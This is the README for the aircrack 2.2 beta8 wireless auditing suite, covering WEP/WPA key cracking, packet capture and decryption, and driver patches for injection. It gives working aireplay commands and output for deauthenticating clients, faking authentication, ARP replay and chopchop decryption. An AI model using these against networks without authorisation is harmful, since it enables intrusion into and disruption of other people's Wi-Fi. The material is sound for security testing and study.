


                            aircrack 2.2 beta8



    Thanks for beta-testing this software! If you find bugs or
    have a feature request, mail me at cdevine@cr0.net.


    Please note that packet injection with aireplay only works
    with Prism2, Prism54 and Atheros cards. Injection on other
    chipsets (Centrino, Hermes, etc.) is NOT supported.


    Using aircrack
    ==============

        Options summary:
        ---------------

        -a amode : force the attack mode, 1 for WEP and 2 for WPA
        
        -e essid : select the target network based on the essid:
                   use all IVs from multiple APs with same ESSID.
                   also required to crack WPA-PSK if the ESSID is
                   cloaked (hidden).

        -b bssid : select the target network based on the access
                   point's MAC address

        -p nbcpu : on SMP systems, set this option to the number of CPUs

        -q       : quiet mode: no status information is displayed

        -c       : restrict the key search space to the ASCII character set

        -d start : force the beginning of the WEP key. only useful for
                   debugging purposes

        -m maddr : only keep the IVs coming from packets that match this
                   MAC address. alternatively, use -m ff:ff:ff:ff:ff:ff
                   to use all and every IVs, regarless of the network
                   (this disables essid and bssid filtering)

        -i index : only keep the IVs that have this key index (1 to 4).
                   the default behaviour is to ignore the key index
                   in the packet, and use the IV regardless

        -f fudge : by default, this parameter is set to 2 for 104-bit WEP
                   and to 5 for 40-bit WEP. use a higher value to increase
                   the bruteforce level: cracking will take more time, but
                   with a higher likelyhood of success

        -k korek : there are 17 korek attacks. sometimes one attack creates
                   a huge false positive that prevents the key from being
                   found, even with lots of IVs. try -k 1, -k 2, ... -k 17
                   to disable each attack selectively

        -x       : do not bruteforce the last two keybytes

        -y       : this is an experimental single bruteforce attack which
                   is only intended to be used when then standard attack
                   does not work with more than one million IVs.

        -w words : path to a dictionnary file for wpa cracking

        -0       : ay, caramba


    Using airdecap
    ==============

        airdecap can decrypt WEP and WPA data packets. The 802.11
        capture is then transformed to a standard Ethernet capture.

        * convert 802.11 unencrypted traffic to Ethernet:

            airdecap -b 00:09:5B:10:BC:5A open-network.cap

        * decrypt WEP traffic:

            airdecap -w 11A3E229084349BC25D97E2939 wep.cap

        * decrypt WPA-PSK TKIP/CCMP traffic:

            airdecap -e my_essid -p my_passphrase tkip.cap


    Using airodump
    ==============

        Starting from 2.2-beta1, airodump automatically sets up the
        card in Monitor mode; it does also take care of channel hopping.
        The following chipsets are supported:

            * HermesI (patched orinoco)
            * Cisco Aironet (airo)
            * Centrino b/g (ipw2200)
            * Prism2/2.5/3 (wlan-ng or hostap)
            * PrismGT "FullMAC" (prism54)
            * Atheros (madwifi)

        Please note that ipw2100 is NOT officially supported -- this
        chipset does not properly discard packets with an invalid CRC.
        Also, ndiswrapper (Broadcom, realtek, etc.) is NOT supported.


        You can use airodump to:

        * Analyse a capture file

            ./airodump out.cap toto 0

        * Convert a huge capture to a small .ivs file
          (only useful for WEP cracking)

            ./airodump huge.cap small 0 1

        * Capture packets

            ./airodump ath0 out 0

        The channel "0" above indicates that airodump should perform
        channel hopping. The channel number is ignored if the source
        if a capture file. When capturing IVs, it is best to disable
        channel hopping, and specify the target AP's channel.

        Here's an example screenshot:

-----------------------------------------------------------------------
  BSSID              PWR  Beacons      IP / # Data  CH  MB  ENC  ESSID

  00:13:10:30:24:9C   59      159                3   7  48  WEP  test3

  BSSID              STATION            PWR   Packets  ESSID

  00:13:10:30:24:9C  00:09:5B:EB:C5:2B   60         7  test3
-----------------------------------------------------------------------

            - BSSID is the Access Point MAC address
            - PWR is the signal power, which depends on the driver
            - Packets is the total number of packets, including beacons
              (every AP sends 10 unencrypted announce packets per sec.)
            - LAN IP / # IVs: if unencrypted, the LAN IP adressing,
              otherwise the number of unique WEP Initialization Vectors
            - CH is the channel on which the AP is setup
            - MB is the maximum communication speed.
            - ENC is the encryption protocol in use:
                OPN = open, WEP? = WEP or WPA (no data), WEP, WPA
            - ESSID is the network identifier

        The first part is the detected access points (in this case, only
        00:13:10:30:24:9C on channel 7 with WEP encryption). It also
        displays a list of detection wireless clients ("stations"), in
        this case 00:09:5B:EB:C5:2B. By relying on the signal power,
        one can even physically pinpoint the location of a given station.


    Using aireplay
    ==============

        Driver recompilation
        --------------------

        aireplay only supports injection on Atheros, Prism2/2.5/3 and
        Prism54 FullMAC. Injection on Centrino, HermesI (orinoco) and
        Aironet is currently *NOT* supported.

        For packet injection to work, the driver must be patched,
        recompiled and installed.

        If you don't know how to patch and recompile a driver, just
        use the WHAX Live CD (http://www.iwhax.net/).


        Installing hostap-driver-0.3.7  (Prism2 cards)
        ------------------------------

        Since aireplay-2.2-beta5, injection is fully supported
        in monitor mode on HostAP; it is much more stable than
        linux-wlan-ng.

cd /usr/src
wget http://hostap.epitest.fi/releases/hostap-driver-0.3.7.tar.gz
tar -xvzf hostap-driver-0.3.7.tar.gz
cd hostap-driver-0.3.7
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/hostap-driver-0.3.7.patch.0.1
make clean && make && make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)

        By running "dmesg", you should see the card's primary (PRI)
        and station (STA) firmware:

wifi0: PRI: id=0x15 v1.1.1
wifi0: STA: id=0x1f v1.7.4

        If the firmware is older, you may want to upgrade it:

cd /usr/src
wget http://hostap.epitest.fi/releases/hostap-utils-0.3.7.tar.gz
tar -xvzf hostap-utils-0.3.7.tar.gz
cd hostap-utils-0.3.7
make
cp ~/aircrack-2.2-beta8/linux/prism2/*.hex .
./prism2_srec -f wlan0 pk010101.hex sf010704.hex

        Do not use the more recent firmware version (1.8.x), some
        problems have been reported with HostAP. If you have an older
        Prism2.0 card, you may need to use firmware 1.5.6 instead of
        1.7.4 (see http://linux.junsun.net/intersil-prism/firmware/).


        Installing linux-wlan-ng-0.2.1-pre26
        ------------------------------------

        linux-wlan-ng is an alternate driver for Prism2 cards. If you
        have an USB Prism2 device, you have no choice but to use wlan-ng,
        since HostAP doesn't support them.

        If you only have a PCI or PCMCIA Prism2 card, do NOT install
        this driver -- use HostAP instead: it is much more stable.

cd /usr/src
wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/linux-wlan-ng-0.2.1-pre26.tar.bz2
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
make config
make all
find /lib/modules \( -name p80211* -o -name prism2* \) -exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia restart
(reinsert card)


        When injecting with an USB Prism2, aireplay sometimes hangs
        after a few thousand packets have been injected, or doesn't
        inject at all. This happens because of an unknown bug in
        the wlan-ng injection patch. I don't have an USB Prism2, so
        unfortunately I haven't been able to locate the problem.


        Installing madwifi  (Atheros cards)
        ------------------

        At the moment, the injection patch will only make it possible
        to inject in b mode. Injection in G mode is not supported.
        If the current CVS version does not work, you can download an
        older version of madwifi at http://madwifi.otaku42.de/

cd /usr/src
cvs -z3 -d:pserver:anonymous@cvs.sourceforge.net:/cvsroot/madwifi co madwifi
cd madwifi
patch -Np1 -i ~/aircrack-2.2-beta8/linux/patch/madwifi-20050309.patch.0.1
make
make install
modprobe ath_pci


        Installing prism54
        ------------------

        The latest prism54 driver supports injection out of the box and
        does not require any patch whatsoever.

        Make sure the hotplug package is installed and hotplug firmware
        loading support is present in your kernel (module firmware_class).

        If the kernel message buffer is flooded with timeout errors after
        loading the firmware, then the card is probably a "SoftMAC" model.
        At the moment, prism54 only works with FullMAC cards, which are
        an older and more expensive version of the PrismGT chipset.

        Jean-Baptiste Note has recently started working on a driver for
        PCI and USB SoftMAC devices. See http://jbnote.free.fr/prism54usb/

cd /usr/src
wget http://prism54.org/pub/linux/snapshot/tars/prism54-svn-latest.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules
make install
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
cp 1.0.4.3.arm /lib/firmware/isl3890
modprobe prism54


        Quick reference
        ---------------

        A set of five different attacks has been implemented:

          -0 delay  : deauthenticate all stations
          -1 essid  : fake authentication with AP
          -2        : interactive frame selection
          -3        : standard ARP-request replay
          -4        : decrypt/chopchop WEP packet


        Attack 0: Deauthentication
        ==========================

        By forcing wireless clients to deauthenticate, it's often
        possible to generate ARP requests since Windows clients
        will flush their ARP cache. Also, it's quite useful so as
        to capture hidden ESSIDs and WPA handshakes -- but make
        sure to run airodump (and aireplay -3 for ARP reinjection)
        in separate consoles.

# iwconfig ath0 mode Monitor channel 7
# ifconfig ath0 up

# ./aireplay -0 5 -a 00:13:10:30:24:9C ath0
12:17:20  Sending DeAuth to broadcast -- BSSID: [00:13:10:30:24:9C]
12:17:25  Sending DeAuth to broadcast -- BSSID: [00:13:10:30:24:9C]


        Attack 1: Fake authentication
        =============================

        For a WEP replay attack to work, you need the MAC address of
        an authenticated station. Thus, the -1 attack is quite useful
        to fake authentication in Monitor mode especially if there are
        no connected clients. If there is already a connected client,
        it's preferable to use use his MAC address instead.

# ./aireplay -1 0 -e test3 -a 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0

12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)


        Attack 2: Interactive packet replay
        ===================================

        This attack is mostly useless.


        Attack 3: ARP-request replay
        ============================

        The classic ARP-request replay attack is the most effective
        to generate new IVs, and works very reliably.

# ./aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B -x 600 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2573 packets, sent 1255 packets...


        Attack 4: KoreK's "chopchop" attack
        ===================================

        This attack, when successful, can decrypt a WEP data packet
        without knowing the key. It can even work against dynamic
        WEP. However, not all access points brands are vulnerable;
        in fact this attack fails very often. It has been reported
        to be successful against WRT54G and Aironet.

        Once a packet is decrypted, it is fairly trivial to forge
        an ARP request and re-inject it.


        1. first we decrypt one packet

# ./aireplay -4 -h 00:09:5B:EB:C5:2B -x 600 ath0

        2. let's have a look at the IP address

# tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type IEEE802_11 (802.11)
02:23:01.582189 DA:ff:ff:ff:ff:ff:ff BSSID:00:13:10:30:24:9c SA:00:0e:0c:64:6d:21 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03, IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

        3. forge the ARP request. the source IP doesn't matter,
           but the destination IP must respond to ARP requests.
           the source MAC must belong to an authentication station.

# ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.2 192.168.1.1 arp.cap

        4. finally replay the ARP request

# ./aireplay -2 -r arp.cap ath0

